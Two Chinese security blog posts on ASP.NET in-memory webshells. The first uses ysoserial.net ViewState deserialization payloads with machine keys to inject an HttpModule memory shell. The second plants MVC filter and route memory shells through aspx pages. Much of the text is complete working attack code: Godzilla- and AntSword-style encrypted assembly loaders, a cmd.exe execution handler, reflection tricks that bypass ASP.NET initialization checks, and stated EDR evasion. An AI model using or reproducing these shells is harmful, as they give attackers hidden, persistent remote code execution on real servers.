IndexSec

寻找Http Module内存马并ysoserial.net武器化

Mon, 13 Nov 2023 21:37:00 +0800

原创侠盗鲁平 2023-11-13 21:37 北京

ysoserial.net加载过程

ysoserial.net使用Ghostwebshell命令如下

.\ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "GhostWebshell.cs;System.dll;System.Web.dll;Microsoft.AspNet.FriendlyUrls.dll" --decryptionalg="AES" --decryptionkey="51FE611365277B07911521B7CAFE3766751D16C33D96242F0E63E93FB102BCE2" --validationalg="HMACSHA256" --validationkey="BF579EF0E9F0C85277E75726BFC9D0260FADE8DE2864A583484AA132944F602D" --path="/login.aspx" --apppath="/" --isdebug

使用ActivitySurrogateSelectorFromFile gadget
LosFormatter一般用于序列化存储视图流状态，多用于Web窗体，如ViewState。LosFormatter封装在System.Web.dll中，命名空间为System.Web.UI，使用LosFormatter反序列化不信任的数据会造成RCE
如有反序列化source点，可以用binaryformatter序列化格式
````C:\CoolTools\ysoserial.net\ExploitClass\GhostWebShell.cs;```是文件地址，后面跟的是编译文件所需的dll

nuget拉取项目依赖之后加入命令参数进行调试

项目入口在Program.cs的main函数中

紧接着获取当前程序域的所有加载的程序集类型

GPT time:`AppDomain.CurrentDomain.GetAssemblies().SelectMany(s => s.GetTypes())` 是一段代码，用于获取当前应用程序域（AppDomain）中加载的所有程序集的类型。在 .NET Framework 中，`AppDomain` 是一个应用程序的隔离边界，它包含了应用程序在运行时所需的各种资源，例如程序集、配置信息和安全策略。每个应用程序通常都有一个默认的应用程序域（CurrentDomain），可以通过 `AppDomain.CurrentDomain` 属性来访问。`GetAssemblies()` 方法是 `AppDomain` 类的一个成员方法，用于获取当前应用程序域中加载的所有程序集。它返回一个 `Assembly[]` 数组，包含了当前应用程序域中的所有程序集。`SelectMany(s => s.GetTypes())` 则是对获取到的程序集进行处理的一部分。`SelectMany()` 是 LINQ 扩展方法，用于将每个程序集中的类型集合合并为一个平面的序列。`s => s.GetTypes()` 是一个 lambda 表达式，表示对每个程序集 `s` 调用 `GetTypes()` 方法来获取该程序集中定义的所有类型。因此，`AppDomain.CurrentDomain.GetAssemblies().SelectMany(s => s.GetTypes())` 这段代码的最终结果将是一个包含当前应用程序域中加载的所有程序集中定义的所有类型的序列（IEnumerable）。通过这段代码，你可以遍历当前应用程序域中的所有类型，并对它们进行各种操作，例如反射、实例化、属性访问等。这对于一些需要动态处理和探索类型的场景非常有用，比如插件系统、反射性能分析等。

接着根据条件筛选出加载器和插件以及格式

紧接着根据提供的gadget参数添加链

添加序列化格式

设置generetor

接下来经过一些合法性判断

开始初始化generetor

解析参数，让我们进入ActivitySurrogateSelectorFromFileGenerator看一下

首先关闭活动代理选择器类型检查的功能

ActivitySurrogateSelector为不可序列化的类提供了包装器，微软为了修复这个问题添加了类型检查功能，这里将它关了

可以看到GhostWebshell中的类未标记可被序列化

解析参数后用编译器将代码编译并返回结果byte[]，并将结果根据提供的序列化格式参数进行序列化并返回结果

最后将base64后的结果输出

接着转过头看

GhostWebshell，关键的语句如下

将自定义的虚拟路径进行注册

通过viewstate请求ghostewbshell内存马，默认4.7.2版本，开启friendlyurls

ban掉web.config中的类型检测

注入成功，请求生成

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\vs\d06db0ae\5938043f\App_Web_1.aspx.f6cd8fc2.z-abnbdq.dll

以及

App_Web_ghostfile485.aspx.f6cd8fc2.cet1f-sj.0.cs

等文件

使用edr进行检测均未发现报毒

这里可以看到他本身还是添加一个新的vp路径把aspx放进去，访问后会生成dll方便持久化控制，如果只是viewstate中的代码，在一个请求的生命周期结束后，就会gg，这就是下面哥斯拉的这个攻击成功后很快下线的原因，如果要持续化，要把生成的payload放在左边添加数据中反复请求

class d{    public d()    {        System.Web.HttpContext Context = System.Web.HttpContext.Current;        Context.Server.ClearError();        Context.Response.Clear();        try        {            string key = "3c6e0b8a9c15224a";            string pass = "pas";            string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");            byte[] data = System.Convert.FromBase64String(Context.Request[pass]);            data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);            if (Context.Session["payload"] == null)            {                Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });            }            else            {                System.IO.MemoryStream outStream = new System.IO.MemoryStream();                object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY");                o.Equals(Context); o.Equals(outStream); o.Equals(data); o.ToString();                byte[] r = outStream.ToArray();                Context.Response.Write(md5.Substring(0, 16));                Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));            }        }        catch (System.Exception) { }        Context.Response.Flush();        Context.Response.End();    }}

改造内存马

Route

修改项目Framework版本

首先为项目添加mvc包支持

修改文件熟悉

-p ViewState -g ActivitySurrogateSelectorFromFile -c "RouteWebshell.cs;System.dll;System.Web.dll;System.Web.Mvc.dll" --decryptionalg="AES" --decryptionkey="51FE611365277B07911521B7CAFE3766751D16C33D96242F0E63E93FB102BCE2" --validationalg="HMACSHA256" --validationkey="BF579EF0E9F0C85277E75726BFC9D0260FADE8DE2864A583484AA132944F602D" --path="/login.aspx" --apppath="/" --isdebug

比较麻烦的的一点是exploitclass和ysoserial属于两个不同的项目，每次修改代码之后记得要build一次，不然运行ysoerial不会编译新的代码

这里有个和蚁剑作者写的不同的地方

使用web forms框架的项目，通常不用mvc的filter去做权限控制

使用mvc的通常也不用viewstate去控制页面状态

Http Module

http module介绍

HttpHandler（HTTP处理程序）和HttpModule（HTTP模块）是ASP.NET处理HTTP请求的重要组件

首先我们来看一下ASP.NET处理web请求的流程~~~~

可以看到在经过http module对请求的处理后才进入handler对请求做进一步的处理

Http请求像是一个旅客身上带着行李拿着票来搭火车.

HttpHandler 是火车的终点站.HttpModule 是火车中途停靠的各站.

要查看有哪写IHttpModule或IHttpHandler被注册可以看applicationhost.config

路径：C:\Users[user]\Documents\IISExpress\config\applicationhost.config

创建一个http module

首先创建一个http module

using System;using System.Web;public class HelloWorldModule : IHttpModule{    public HelloWorldModule()    {    }    public String ModuleName    {        get { return "HelloWorldModule"; }    }    // In the Init function, register for HttpApplication     // events by adding your handlers.    public void Init(HttpApplication application)    {        application.BeginRequest +=             (new EventHandler(this.Application_BeginRequest));        application.EndRequest +=             (new EventHandler(this.Application_EndRequest));    }    private void Application_BeginRequest(Object source,          EventArgs e)    {    // Create HttpApplication and HttpContext objects to access    // request and response properties.        HttpApplication application = (HttpApplication)source;        HttpContext context = application.Context;        string filePath = context.Request.FilePath;        string fileExtension =             VirtualPathUtility.GetExtension(filePath);        if (fileExtension.Equals(".aspx"))        {            context.Response.Write("
" +                "HelloWorldModule: Beginning of Request" +                "
");        }    }    private void Application_EndRequest(Object source, EventArgs e)    {        HttpApplication application = (HttpApplication)source;        HttpContext context = application.Context;        string filePath = context.Request.FilePath;        string fileExtension =             VirtualPathUtility.GetExtension(filePath);        if (fileExtension.Equals(".aspx"))        {            context.Response.Write("
" +                "HelloWorldModule: End of Request
");        }    }    public void Dispose() { }}

然后再web.config中注册

那么我们能动态修改web.config并加载我们的module，但是修改核心配置文件动静太大了

        Configuration config = WebConfigurationManager.OpenWebConfiguration("~");// 获取系统.web/httpModules 节点        HttpModulesSection httpModulesSection = (HttpModulesSection)config.GetSection("system.web/httpModules");// 创建自定义模块的配置元素        HttpModuleAction moduleAction = new HttpModuleAction("CustomModule", "YourNamespace.CustomModule, YourAssembly");// 将自定义模块的配置元素添加到 httpModulesSection        httpModulesSection.Modules.Add(moduleAction);// 保存配置更改        config.Save();

module init

接下来看一下写在web.config里面的module是在哪里注册的

就在Httpapplication.cs中

https://referencesource.microsoft.com/#System.Web/HttpApplication.cs,bdaceac545ce071d,references

可以看到读取配置文件并将在

web.config

文件中注册的module放在

HttpModuleCollection

类型的集合中并传递给属性

_moduleCollection

接下来看一下

InitModulesCommon

方法做了什么操作

https://referencesource.microsoft.com/#System.Web/HttpApplication.cs,44cc1113dad08b6d

可以看到就是循环执行每个

module

的

init

方法

这里看下我们的自定义

module

的

init

方法，可以看到就是把我们的事件处理方法包装成

EventHandler

并挂载到

httpapplication

实例的事件上。

所以一开始的思路是

把我们的自定义module通过反射的方式添加到_moduleCollection
执行InitModulesCommon方法

FieldInfo moduleCollectionField = httpApplicationType.GetField("_moduleCollection", BindingFlags.Instance | BindingFlags.NonPublic);         object moduleCollectionValue = moduleCollectionField.GetValue(httpApplicationInstance);        MethodInfo addMethod = moduleCollectionValue.GetType().GetMethod("AddModule", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);        addMethod.Invoke(moduleCollectionValue, parameters);

这里我们使用HttpModuleCollection的AddModule方法向集合添加module

https://referencesource.microsoft.com/#System.Web/HttpModuleCollection.cs,3e6ca3076722037d

MethodInfo initMethod = httpApplicationType.GetMethod("InitModulesCommon",System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);initMethod.Invoke(httpApplicationInstance, null);

但是报错显示在Httpapplication初始化之后校验方法的InvocationFlags标志位

https://referencesource.microsoft.com/#mscorlib/system/reflection/fieldinfo.cs,533cc59fbe48130c

https://referencesource.microsoft.com/#mscorlib/system/reflection/methodbase.cs,22ea3e7b5798f250

不能再执行init方法

尝试反射修改方法的属性值

PropertyInfo invocationFlagsProperty = initMethod.GetType().GetProperty("InvocationFlags", BindingFlags.Instance | BindingFlags.NonPublic);        INVOCATION_FLAGS newFlagsValue1 = INVOCATION_FLAGS.INVOCATION_FLAGS_UNKNOWN;        invocationFlagsProperty.SetValue(initMethod, newFlagsValue1);

但该属性值没有set方法

上面的方法失败了，开始思考微软是否会有支持在不修改web.config的情况下动态添加module的方法，于是找到了LegacyModuleRegistrar

Type legacyModuleRegistrarType = typeof(DynamicModuleUtility); // 将 ContainingType 替换为包含 LegacyModuleRegistrar 类的实际类型        Type legacyModuleRegistrarNestedType = legacyModuleRegistrarType.GetNestedType("LegacyModuleRegistrar", BindingFlags.NonPublic);        if (legacyModuleRegistrarNestedType != null)        {            object legacyModuleRegistrarInstance = Activator.CreateInstance(legacyModuleRegistrarNestedType);

但是需要在头部添加标签

[assembly: PreApplicationStartMethod(typeof(WebApplication2.PreApplicationStartCode), "PreStart")]

很遗憾这仍然不是通过一个payload就能实现的操作

在如何执行init方法这里卡了几天，想到我们能不能直接执行init，只要把我们的方法挂到事件上就可以,在这个过程中我又发现了对httpapplication是否已经初始化的校验

通过反射进行修改绕过

FieldInfo initField = httpApplicationType.GetField("_initInternalCompleted", BindingFlags.Instance | BindingFlags.NonPublic);         initField.SetValue(httpApplicationInstance,false);        //初始化 module        customModule.Init(this.Context.ApplicationInstance);        initField.SetValue(httpApplicationInstance,true);

然而当我们去请求的时候，发现我们挂载到事件上的方法并没有执行。

事件挂载

跟踪挂载过程发现调用私有方法HttpApplication.AddSyncEventHookup

尝试反射修改掉IsContainerInitalizationAllowed，然后发现无法绕过的地方，在读取moduleContainer过程中我们的key为Global.asax，且基于ASP.NET安全机制无法通过反射修改。

于是决定通过反射的方式，直接完成方法功能

首先反射调用Addhandler

 PropertyInfo eventsProperty = httpApplicationType          .GetProperty("Events", BindingFlags.Instance | BindingFlags.NonPublic);        object eventsInstance = eventsProperty.GetValue(httpApplicationInstance);        MethodInfo addHandlerMethod = eventsInstance.GetType()          .GetMethod("AddHandler");

通过HttpApplication的方法，获取一个初始化过程中已经加载了的module container,这里选的是AspNetFilterModule

        MethodInfo getModuleContainerMethod = httpApplicationType.GetMethod("GetModuleContainer", BindingFlags.Instance | BindingFlags.NonPublic);        object[] parametersCurrentModuleCollectionKey = new object[] { "AspNetFilterModule" }; // 根据方法参数进行适当调整        object moduleContainer = getModuleContainerMethod.Invoke(httpApplicationInstance, parametersCurrentModuleCollectionKey);

第三步通过反射调用构造函数创建step实例

Type syncEventExecutionStepType = httpApplicationType.GetNestedType("SyncEventExecutionStep", BindingFlags.NonPublic);        ConstructorInfo constructor = syncEventExecutionStepType.GetConstructor(BindingFlags.NonPublic | BindingFlags.Instance, null, new Type[] { typeof(System.Web.HttpApplication), typeof(EventHandler) }, null);        object step = constructor.Invoke(new object[] { httpApplicationInstance, c });

最终调用AddEvent方法，将我们的step和RequestNotification类型的事件绑到一起，添加到我们的moduleContainer中

MethodInfo getAddEventMethod = moduleContainer.GetType().GetMethod("AddEvent",BindingFlags.Instance | BindingFlags.NonPublic);        object[] AddEventMethodPs = { RequestNotification.LogRequest, false, step };        getAddEventMethod.Invoke(moduleContainer, AddEventMethodPs);

这里是把事件处理方法绑定到AspNetFilterModule中的RequestNotification.LogRequest事件上，其他的module和事件都可以绑定，但是要考虑触发时机，这里选择的点是因为在HttpApplicaiton初始化过程中执行的 BuildSteps方法中提到了一系列事件方法绑定，方便注入内存马后触发事件验证是否成功注入。

在vs中ASP.NET web forms默认加载module如下

OutputCacheSessionWindowsAuthenticationFormsAuthenticationDefaultAuthenticationRoleManagerUrlAuthorizationFileAuthorizationAnonymousIdentificationProfileUrlMappingsModuleServiceModel-4.0UrlRoutingModule-4.0ScriptModule-4.0__DynamicModule_Microsoft.AspNet.FriendlyUrls.FriendlyUrlsModule, Microsoft.AspNet.FriendlyUrls, Version=1.0.2.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35_4c981331-8571-4eda-a0b1-c8a08b21b919__DynamicModule_Microsoft.WebTools.BrowserLink.Runtime.Tracing.PageInspectorHttpModule, Microsoft.WebTools.BrowserLink.Runtime, Version=17.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a_071bf808-e9ff-4716-9075-330cc6c7d2bf__DynamicModule_System.Web.WebPages.WebPageHttpModule, System.Web.WebPages, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35_61a71c81-26f2-4327-8ed9-512c10656f3e__DynamicModule_System.Web.Optimization.BundleModule, System.Web.Optimization, Version=1.1.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35_27f7cfdc-74e2-4862-

最终完整代码如下

public class F    {        public class CustomModule : System.Web.IHttpModule        {            public void Init(System.Web.HttpApplication httpApp)            {                            }            // Issues a custom begin request event.                        public void OnEnter(System.Object sender, System.EventArgs e)            {                System.Web.HttpApplication httpApp = sender as System.Web.HttpApplication;                                System.Diagnostics.Process p2 = new System.Diagnostics.Process();                p2.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";                p2.StartInfo.Arguments = "/c whoami /priv > C:\\Windows\\Temp1.txt";                p2.StartInfo.UseShellExecute = false;                p2.StartInfo.RedirectStandardError = true;                p2.StartInfo.RedirectStandardOutput = true;                p2.Start();            }            public void Dispose()            {            }        }        public F()         {            System.Web.HttpContext Context = System.Web.HttpContext.Current;            Context.Server.ClearError();            Context.Response.Clear();            try             {                System.Web.HttpApplication httpApplicationInstance = System.Web.HttpContext.Current.ApplicationInstance;                System.Type httpApplicationType = typeof(System.Web.HttpApplication);                string name = "CustomModule"; // 模块名称                CustomModule customModule = new CustomModule(); // 自定义的 IHttpModule 实例                object[] parameters = new object[] { name, customModule };                System.EventHandler c = new System.EventHandler(customModule.OnEnter);                                System.Reflection.PropertyInfo eventsProperty = httpApplicationType                    .GetProperty("Events", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);                object eventsInstance = eventsProperty.GetValue(httpApplicationInstance);                System.Reflection.MethodInfo addHandlerMethod = eventsInstance.GetType()                    .GetMethod("AddHandler");                        object[] parametersAddHandler = new object[] { new object(), c }; // 根据方法参数进行适当调整                addHandlerMethod.Invoke(eventsInstance, parametersAddHandler);                // 调用 GetModuleContainer 方法                System.Reflection.MethodInfo getModuleContainerMethod = httpApplicationType.GetMethod("GetModuleContainer", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);                object[] parametersCurrentModuleCollectionKey = new object[] { "AspNetFilterModule" }; // 根据方法参数进行适当调整                object moduleContainer = getModuleContainerMethod.Invoke(httpApplicationInstance, parametersCurrentModuleCollectionKey);                                System.Type syncEventExecutionStepType = httpApplicationType.GetNestedType("SyncEventExecutionStep", System.Reflection.BindingFlags.NonPublic);                System.Reflection.ConstructorInfo constructor = syncEventExecutionStepType.GetConstructor(System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Instance, null, new System.Type[] { typeof(System.Web.HttpApplication), typeof(System.EventHandler) }, null);                object step = constructor.Invoke(new object[] { httpApplicationInstance, c });                                System.Reflection.MethodInfo getAddEventMethod = moduleContainer.GetType().GetMethod("AddEvent",System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);                object[] AddEventMethodPs = { System.Web.RequestNotification.LogRequest, false, step };                getAddEventMethod.Invoke(moduleContainer, AddEventMethodPs);             }catch(System.Exception e)            {                Context.Response.Write(e.Message);            }            Context.Response.Flush();            Context.Response.End();                }                }

选择RequestNotification.LogRequest事件的原因是因为事件发生位置靠后，然而实战中发现LogRequest发生时，当前请求处理已经结束，当前context实例的session实例为null。所以选择Session module的AcquireRequestState事件(在session实例初始化后和垃圾回收前)，在不修改哥斯拉原本payload位置的情况下完成内存马功能

public class F    {        public class CustomModule : System.Web.IHttpModule        {            public void Init(System.Web.HttpApplication httpApp)            {            }            // Issues a custom begin request event.            public void OnEnter(System.Object sender, System.EventArgs e)            {                System.Web.HttpContext context = ((System.Web.HttpApplication)sender).Context;                context.Server.ClearError();                context.Response.Clear();                string kk = "3c6e0b8a9c15224a";                string pp = "pas";                string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pp + kk))).Replace("-", "");                byte[] data = System.Convert.FromBase64String(context.Request[pp]);                //context.Response.Write(context.Request[pp]);                data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(kk), System.Text.Encoding.Default.GetBytes(kk)).TransformFinalBlock(data, 0, data.Length);                if (context.Session["payload"] == null)                {                    context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });                }                else                {                    System.IO.MemoryStream outStream = new System.IO.MemoryStream();                    object o = ((System.Reflection.Assembly)context.Session["payload"]).CreateInstance("LY");                    o.Equals(context); o.Equals(outStream); o.Equals(data); o.ToString();                    byte[] r = outStream.ToArray();                    context.Response.Write(md5.Substring(0, 16));                    context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(kk), System.Text.Encoding.Default.GetBytes(kk)).TransformFinalBlock(r, 0, r.Length))); context.Response.Write(md5.Substring(16));                }                                context.Response.Flush();                context.Response.End();            }            public void Dispose()            {            }        }        public F()         {            System.Web.HttpContext Context = System.Web.HttpContext.Current;            Context.Server.ClearError();            Context.Response.Clear();            try             {                System.Web.HttpApplication httpApplicationInstance = System.Web.HttpContext.Current.ApplicationInstance;                System.Type httpApplicationType = typeof(System.Web.HttpApplication);                string name = "CustomModule"; // 模块名称                CustomModule customModule = new CustomModule(); // 自定义的 IHttpModule 实例                object[] parameters = new object[] { name, customModule };                System.EventHandler c = new System.EventHandler(customModule.OnEnter);                                System.Reflection.PropertyInfo eventsProperty = httpApplicationType                    .GetProperty("Events", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);                object eventsInstance = eventsProperty.GetValue(httpApplicationInstance);                System.Reflection.MethodInfo addHandlerMethod = eventsInstance.GetType()                    .GetMethod("AddHandler");                        object[] parametersAddHandler = new object[] { new object(), c }; // 根据方法参数进行适当调整                addHandlerMethod.Invoke(eventsInstance, parametersAddHandler);                // 调用 GetModuleContainer 方法                System.Reflection.MethodInfo getModuleContainerMethod = httpApplicationType.GetMethod("GetModuleContainer", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);                object[] parametersCurrentModuleCollectionKey = new object[] { "AspNetFilterModule" }; // 根据方法参数进行适当调整                object moduleContainer = getModuleContainerMethod.Invoke(httpApplicationInstance, parametersCurrentModuleCollectionKey);                                System.Type syncEventExecutionStepType = httpApplicationType.GetNestedType("SyncEventExecutionStep", System.Reflection.BindingFlags.NonPublic);                System.Reflection.ConstructorInfo constructor = syncEventExecutionStepType.GetConstructor(System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Instance, null, new System.Type[] { typeof(System.Web.HttpApplication), typeof(System.EventHandler) }, null);                object step = constructor.Invoke(new object[] { httpApplicationInstance, c });                                System.Reflection.MethodInfo getAddEventMethod = moduleContainer.GetType().GetMethod("AddEvent",System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);                object[] AddEventMethodPs = { System.Web.RequestNotification.LogRequest, false, step };                getAddEventMethod.Invoke(moduleContainer, AddEventMethodPs);            }catch(System.Exception e)            {                Context.Response.Write(e.Message);            }                        Context.Response.Flush();            Context.Response.End();                }                }

ysoserial命令如下

ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "FilterWebshell.cs;System.dll;System.Web.dll" --decryptionalg="AES" --decryptionkey="51FE611365277B07911521B7CAFE3766751D16C33D96242F0E63E93FB102BCE2" --validationalg="HMACSHA256" --validationkey="BF579EF0E9F0C85277E75726BFC9D0260FADE8DE2864A583484AA132944F602D" --path="/login.aspx" --apppath="/" --isdebug

生成payload

将payload注入

填写任意url，需多点几次验证，确定请求可触发事件（一开始几次会提示初始化失败）

成功注入及免杀

参考链接

https://isdaniel.github.io/

阅读原文

跳转微信打开

ASP.NET 内存马与魔改蚁剑内存马回显

Sat, 11 Nov 2023 15:21:00 +0800

原创侠盗鲁平 2023-11-11 15:21 北京

测试环境

在此选项中选择mvc

项目入口在global.asax

官方文档

https://learn.microsoft.com/zh-cn/aspnet/mvc/overview/

https://learn.microsoft.com/zh-cn/previous-versions/aspnet/

种马方式

直接上传aspx访问
反序列化
lolbas+命令执行
直接执行exe(listener)

Framework

filter

asp.net mvc下的filter内存马，必须依赖于system.web.mvc.dll这个东西，也就是只能在.net mvc下使用，执行权限为iis用户权限

入口点在global.asax的GlobalFilters

Filters来自GlobalFilterCollections()

根据官方定义和注释可以看到是一个保存了全局所有的filter集合的类

基础：asp.net list泛型集合https://dotblogs.com.tw/CodingInInDer/2018/06/21/104609

GlobalFilterCollection类中包含两个Add重载方法和AddInternal，

基础：asp.net函数重载https://blog.csdn.net/qq_34573534/article/details/100135237

在AddInternal中对filter实例的类型进行了判断，从这里就可以看到asp.net framework对filter类型的支持

IActionFilter 操作筛选器IAuthorizationFilter 授权筛选器（定义授权过滤器所需的方法。）IExceptionFilter 异常筛选器IResultFilter 结果筛选器IAuthenticationFilter 身份验证筛选器（定义执行身份验证的过滤器。）这个是MVC5中新增的过滤器，目前介绍内存马的文章都比较老了，没有介绍这个过滤器

基础：5种过滤器https://kknews.cc/code/roe44v.html

IAuthenticationFilter的执行顺序早于IAuthorizationFilter

在MVC5中将认证和授权拆开IAuthenticationFilter负责认证，IAuthorizationFilter负责授权

在FilterProviderCollection.Compare中，根据order值判断filter处理顺序，order一致的情况下对比作用域Scope

基础：asp.net的作用域https://www.cnblogs.com/xiaoxiaotank/p/15622083.html过滤器的作用域范围，可分为三种，从小到大是：1.某个Controller中的某个Action上（不支持Razor Page中的处理方法）2.某个Controller或Razor Page上3.全局，应用到所有Controller、Action和Razor Page上

接下来看FilterProviders.cs，这是一个全局的系统默认FilterFilter provider，为filter提供一个注册点

基础：asp.net强制类型转换(IFilterProvider) 是一个类型转换，将括号中的对象强制转换为 IFilterProvider 接口的实现。

不同filter执行顺序围如下：

请求通过授权过滤器、资源过滤器、模型绑定、操作过滤器、操作执行和操作结果转换、异常过滤器、结果过滤器和结果执行进行处理。返回时，请求仅由结果过滤器和资源过滤器进行处理，变成发送到客户端的响应。

根据在ControllerActionInvoke在InvokeAction中的判断顺序可看到filter执行顺序

任意web可访问目录添加aspx文件

<%@ Page Language="C#" CodeBehind="test.aspx.cs" Inherits="WebApplication3.Models.test" %><%@ Import namespace="System.Diagnostics"%><%@ Import namespace="System.Reflection"%><%@ Import namespace="System.Web.Mvc"%>http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><%    GlobalFilterCollection globalFilterCollection = GlobalFilters.Filters;    globalFilterCollection.Add(new MyAuthFilter(),-2);%>http://www.w3.org/1999/xhtml">    Title

配合检测工具可以看到内存马成功注入并可执行命令

调试可看到注册filter

也可以看到就是从上面提到的ColltrollerActionInvoker对filter进行调用

MVC5 新filter接口

因为上面说过IAuthenticationFilter的执行顺序早于IAuthorizationFilter，所以对内存马实现的接口进行更换

<%@ Page Language="C#" CodeBehind="test.aspx.cs" Inherits="WebApplication3.Models.test" %><%@ Import namespace="System.Diagnostics"%><%@ Import namespace="System.Reflection"%><%@ Import namespace="System.Web.Mvc"%><%@ Import Namespace="System.Web.Mvc.Filters" %>http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><%    GlobalFilterCollection globalFilterCollection = GlobalFilters.Filters;    globalFilterCollection.Add(new MyAuthFilter(),-2);%>http://www.w3.org/1999/xhtml">    Title

检测手段

https://github.com/yzddmr6/ASP.NET-Memshell-Scanner/blob/master/aspx-memshell-scanner.aspx

本来看到蚁剑作者的介绍中没有聊IAuthenticationFilter过滤器，想着写的工具是不是没有对应检测手段，结果是列出所有filter手动删。。。。。

route

原理：动态打进去一个路由，然后映射到我们自定义的类
条件：不需MVC，普通权限上传aspx可解析即可

不使用Global.asax中的 RouteConfig.RegisterRoutes作为入口的原因是因为调用System.Web.Mvc.RouteCollectionExtensions.MapRoute方法，而这个方法也是要依赖System.Web.Mvc.dll的

System.Web.Mvc.RouteCollectionExtensions.MapRoute调用Route.add方法添加RouteBase类型的Route

RouteBase是个抽象类，默认的实现为System.Web.Routing.Route

派生RouteBase

GetRouteData

重写GetRouteData方法插入自定义逻辑并在RouteCollection中添加路由：

<%@ Page Language="C#" CodeBehind="test.aspx.cs" Inherits="WebApplication3.Models.test" %><%@ Import namespace="System.Reflection"%><%@ Import Namespace="System.Web.Routing" %><%@ Import namespace="System.Diagnostics"%><%@ Import Namespace="System.Web.Mvc" %>http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><%    RouteCollection routes = RouteTable.Routes;    routes.Insert(0, (RouteBase)new MyRoute());%>http://www.w3.org/1999/xhtml">    Title

实战中为了避免蚁剑等cn工具指纹可以把蚁剑反序列化加载payload的语句换成和filter中一样用process创建进程执行命令的payload或如（https://paper.seebug.org/1953/#0x07）改成加载我们写好的assembly，但（https://www.crisprx.top/archives/552）这篇文章复现直接在controller中写route实战完全没法用，很离谱

GetVirtualPath

改一下函数就行了，没什么区别

public override VirtualPathData GetVirtualPath(RequestContext requestContext, RouteValueDictionary values)        {            HttpContext context = HttpContext.Current;            String Payload = context.Request.Form["ant"];            if (Payload != null)            {                System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));                assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(context);                context.Response.End();            }            return null;        }

执行顺序：GetRouteData>Controller>GetVirtualPath

添加Route类

实现IRouteHandler接口需要实现GetHttpHandler方法，需要返回一个实现了IHttpHandler的handler

GetHttpHandler

添加route方式略有不同

<%@ Page Language="C#" CodeBehind="route2.aspx.cs" Inherits="WebApplication3.Models.route2" %><%@ Import Namespace="System.Web.Routing" %>http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><%    RouteCollection routes = RouteTable.Routes;    Route route = new Route("test{page}", new MyRoute());     routes.Add(route);%>http://www.w3.org/1999/xhtml">    Title

添加成功

IHttpHandler

在自定义route类中实现一个handler嵌套类，实现IHttpHandler"接口，把函数操作放到自定义handler里面，然后补充一下需要的构造函数即可，设置"IsReusable"属性以指示处理程序不可以被重复使用。

public RequestContext RequestContext { get; private set; }

定义了"MyHandler"类中的一个属性"RequestContext"，它是一个只读的公共属性，可以从外部读取，但只能在类的内部进行设置，即设置属性的访问器是私有的。RequestContext是一个包含有关HTTP请求的上下文信息的类。通过在"MyHandler"类中定义这个属性，可以获取请求的上下文信息,如访问请求的URL、HTTP方法、参数等信息

<%@ Page Language="C#" CodeBehind="route2.aspx.cs" Inherits="WebApplication3.Models.route2" %><%@ Import Namespace="System.Web.Routing" %>http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><%    RouteCollection routes = RouteTable.Routes;    Route route = new Route("test{page}", new MyRoute());     routes.Add(route);%>http://www.w3.org/1999/xhtml">    Title

注入成功

listener

前置条件

使用条件：system权限
实现原理：本质上是重新启动了一个web程序并进行端口复用（类似于python直接起了个simpleHttp），主要用于维权，因为是攻击者启动的Server所以不会在原有的Web中留下日志

通过提取HttpListenerRequest，HttpListenerResponse的参数来构造一个我们可以用的System.Web.Request跟System.Web.Response对象，然后作为参数实例化一个System.Web.HttpContext

利用HttpContext.Current获取到当前Web的HttpContext；创建一个新的Thread，并把当前Thread的HttpContext传递过去防止进程终止

